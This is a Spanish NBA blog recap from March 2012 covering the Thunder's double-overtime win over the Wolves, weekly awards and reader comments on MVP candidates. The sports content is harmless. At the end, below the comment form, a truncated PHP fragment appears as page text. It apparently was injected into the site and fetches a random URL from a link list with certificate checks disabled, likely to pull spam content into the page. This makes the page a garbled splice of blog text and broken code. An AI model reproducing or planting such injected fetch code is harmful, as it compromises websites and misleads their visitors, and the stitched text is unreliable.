Informe del fin de semana: Premio para los que no durmieron el viernes

26 de March de 2012 por TheDeerHunter

“Hoy sí que es un partido en el que no dormir es de valientes, más que dormir es de cobardes… porque vaya tela. A quién le interesa un Wolves-Oklahoma sin Rubio?” Sancho dixit.

Claro que sí, con un par.  El pasado fin de semana será recordado por dos cosas: por el partido del curso 2011-2012 sobre el que habrá algún día que escribir un artículo homenaje y por el gran ojo de Sancho a la hora de anticiparse a los acontecimientos. Y es que me consta que mucha gente que probablemente no había visto más de dos partidos de baloncesto en su vida el sábado por la tarde se quedó enganchada al espectáculo del Wolves 140 – Thunder 149 en diferido. Una auténtica pasada para crear afición y para hacer historia.

“Dos triplazos de Durant, el primero para ganar el partido lo anuló Kevin Love con otro para mandarlo a la prórroga, después otro triplazo de Durant para empatar el partido en la 1º prorroga.” Heineken, dándonos un par de pinceladas de esta inmensidad de partido.

Además, el viernes destacaba la exhibición de Lakers (96-103), la primera derrota de Woodson con los Knicks (79-96), el palizón de los Jazz a los Nuggets (102-121) y la victoria de los Spurs en el derbi tejano (87-104).

La noche del sábado la atención se centraba en el Memphis@Clippers (85-101) donde Del Negro salvaba el puesto, de momento.

“Memphis no funciona con Zach, como antes deciamos que no funcionaba con gay, pues creo que el tema es que no funciona bien con ambos a la vez, los dos exigen demasiados tiros” Esteban

También poníamos un ojo en la fácil victoria de los Knicks contra Detroit (79-101) y en la exhibició de Klay Thompson para ganar a los Kings (108-101). Nowitzki se tiró el equipo a la espalda para salir vivos de Houston (101-99) y Boozer hizo lo propio con sus Bulls ante Toronto (101-102).

Finalmente anoche los Thunder cerraban su gran fin de semana destrozando a los Heat (87-103). “Ibaka y Perkins abusando del juego interior Heat. Aviso para PO.” Nacho

Love destrozaba a los Nuggets (100-117); los Hawks se imponían a los Jazz después de 4 prórrogas (133-139), y los Lakers le daban vidilla a Memphis tras su terrorífica gira (102-96).

Premios

MVP: No podemos separar el uno del otro. Los dos Kevin, Love y Durant, han sido los grandes protagonistas del fin de semana y, en especial de la noche del viernes. Ójala esto sea el comienzo de una gran rivalidad en todo lo alto los próximos años.

Rookie: Venimos siguiendo a Klay Thompson las últimas semanas. El sábado brilló con 31 puntos ante Kings.

Sorpresa: Destacábamos a los ex de Lakers, (Shannon Brown, 16 puntos, 1 asistencia y 3 rebotes; Luke Walton, 7 puntos, 2 asistencias y 2 rebotes) mientras los amarillos caían ante Memphis.

Decepción: Dos palizas encajadas por los Nuggets, ante Jazz y ante Minny, en dos partidos bastante malos de Ty Lawson. Mientras Nené empieza a faltar partidos en Washington en lugar de faltar en Denver.

Esfuerzo en vano: Gran actuación de Demarcus Cousins la noche del sábado, sin premio.

Comenta

14 comentarios a esta entrada

  1. Ekos dice:
    #1

    A lo Garnett-Duncan nos espera una gran rivalidad entre Kevin’s , partido orgásmico. Sancho, menudo FAIL! x’D Estoy en el insti, después comento más en profundidad.

      Citar

  2. simon dice:
    #2

    yo creo que a estas alturas nadie duda de quien son los dos mejores jugadores del mundo verdad?? o aun hay debate??? entenderia que se discuta el 3 puesto ( lebron, Bryant, Wade, Rose ) pero para mi los dos mejores sin duda son Durant y Love en ese orden, y por cierto la distancia se alarga mucho respecto al tercero en los minutos finales…

      Citar

  3. simon dice:
    #3

    por cierto a riesgo de que me deis por todos lados palos pq este año he visto muy pocos partidos de los Lakers completos, estoy cansado de oir escuchar que Pau/Bynum son el mejor juego interior de la liga… en ataque seguramente si, pero en defensa son de lo peor que hay, casi cualquier interno rival partido por partido les hace un traje… me encantaría ver si alguien conoce algun sitio que sean pirados de las estadisticas puntos de internos de los equipos rivales vs contra Lakers.

      Citar

  4. nba dice:
    #4

    Tienes razon Simon, en defensa estan muy flojitos, pero hay que tener en cuenta que Pau esta jugando lejos del aro. Yo creo que todavía no se han puesto en “modo playoff” on .
    En vista de los comentarios de Sancho , estaría bien que la NBA añadiese una coletilla :
    No vea la NBA sin supervisión, puede causar adicción y tener graves consecuencias para su salud, consulte con su farmaceutico …

      Citar

  5. Sancho88 dice:
    #5

    JAJAJAJAJ. QUÉ CABRONES!! Bueno, yo sabía que por algo tenía que pasar a la historia, y como siempre fui muy Kevin Garnett, muy bocazas, no es la primera vez que me toca comerme mis comentarios.

    Hostias, algo que no viene a cuento, pero que me ha dejado a cuadros. Tim Duncan: DND – OLD?????????????????????????????’ Eso que es, en serio. Será algo de un ligamento que ponen ellos las siglas así, una lesión antigua, o verdaderamente el pavo del boxscore ha puesto que no ha jugado por viejo, jajaja. Sería muy grande, no creeis?

    Y sí, en serio, a veces es mejor parar un poco el ritmo nocturno. Por lo menos, en mi caso, yo he pagado un poco estar sin dormir por las noches desde el 25 de diciembre. I LOVE THIS GAME!!

      Citar

  6. Txusma dice:
    #6

    simon:
    por cierto a riesgo de que me deis por todos lados palos pq este año he visto muy pocos partidos de los Lakers completos, estoy cansado de oir escuchar que Pau/Bynum son el mejor juego interior de la liga… en ataque seguramente si, pero en defensa son de lo peor que hay, casi cualquier interno rival partido por partido les hace un traje… me encantaría ver si alguien conoce algun sitio que sean pirados de las estadisticas puntos de internos de los equipos rivales vs contra Lakers.

    A lo mejor estos datos te ayudan: http://www.82games.com/1112/1112LAL2.HTM

      Citar

  7. Nacho dice:
    #7

    Confirmado: el bueno de Tim acaba de beber de la fuente de la eterna juventud, y por lo tanto han eliminado el OLD del box score. Que se preparen en el Oeste porque hay quien dice que no solo ha bebido, sino que se ha caído en la marmita.

      Citar

  8. arvydas dice:
    #8

      Citar

  9. sempren dice:
    #9

    Haddadi 10 puntos, 6 rebotes y 3 tapones en 13 minutos contra los Lakers.
    Increible, a pesar de las sensaciones de simon sobre la defensa interior angelina xD

      Citar

  10. ralage dice:
    #10

    La canasta de JJohnson para forzar la 3º Prórroga del Jazz-Hawks es impresionante

      Citar

  11. Esteban dice:
    #11

    estamos a casi 50 partidos de la temproada regular, creo que ya podemos ir discutiendo quien sera el MVP de la temporada

    de lso 3 super equipos veamos

    los bulls han jugado enorme cantidad de partidos sin rose, y han ganado, incluso ha descendido muchisimo en sus numeros de la temporada pasada, dudo que el se lo merezca

    lebron, arranco para arrasar con el premio pero se ha desfinflado mucho, no tiene canastas ganadoras y tampoco ha tenido partidos de escandalo, como triples dobles o irse hasta los 40 puntos en un par de ocaciones

    durant, el maximo candidato creo, aunque sus numeros son mas terrenales que la temporada pasada, y ah compartido muchas victoria gracias a hardem y westbrook, a diferencia de lebron si ha cuajado partidos descomunales y tiros ganadores e importantes por doquier, aunque muchos juegos que su equipo gana no necesitan demasiado de el

    kobe, su seguidilla de 40 puntos o mas al inicio de la temporada le suma puntos, como tambien sr el goleador de la liga, aunque su rendimiento y toma de desiciones por momento deje que desear, si logra que los lakers se afianzen como terceros del oeste, o incluso llega al segundo lugar mejorando algo sus prestacioes, entrara en la discusion

    parker, la temproada de los spurs merece algun reconocimiento y parker es su maxima estrella, aunque en un grupo tan coral dudo que se decante alguien por darle el premio a el, quiza un lugar en el mejor quintento de la nba estaria bien

    cp3, otro que arranco para pelearle el trofeo palmo a palmo al que sea, sus clippers se mantuvieron segundo gran parte del curso, y muchas de sus actuaciones en monentos claves han sido sencillamente brillantes, pero la estrepitosa caida de posicones de los clippers le deja casi fuera de competencia a mi entender, aunque el rendimiento de paul no ah disminuido y sigue siendo descomunal, le falta algo de compañia para tener un mejor record y meterse en la discucion

    howard, sus numeros son terribles, en rebotes de otra era, y el tercer puesto de los humildes magic, sumado a que quiza tamb se lo merecia el curso pasado pueden ayudarlo a ganar, si los magic se matienen terceros y logran acortar brechas con el heat, sin duda algunos votaran por el

    y el tapado, kevin love, para entrar en la discucion debera meter a su equipo en PO, butalla que aun no esta perdida, mes que pasa, mes que mejora y aumenta su rendimiento, actuaciones brutales, tiros trinfadores, y hacer competitivo a uno de los peores equipos de la nba son sus armas, 27 puntos por juego y 13 rebotes, y al ritmo que lleva no es de extrañar que termine superando a durant y hasta a kobe entre los maximos anotadores, casi imposible alcanzar a howard, se ha ido hasta los 30 puntos o mas en 17 oportunidades, y a llegado a 42 y 51, maginifico

    cual es su elegido?

      Citar

  12. Lucho dice:
    #12

    Rondo ya lleva 9 asistencias, y no termino el primer tiempo

      Citar

  13. Lucho dice:
    #13

    Y…. el MVP para mi hasta ahora Durant

      Citar

  14. Esteban dice:
    #14

    Hasta ahora y lo q queda q no es mucho, no habra mayores cambios en los 15 partidos q restan

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>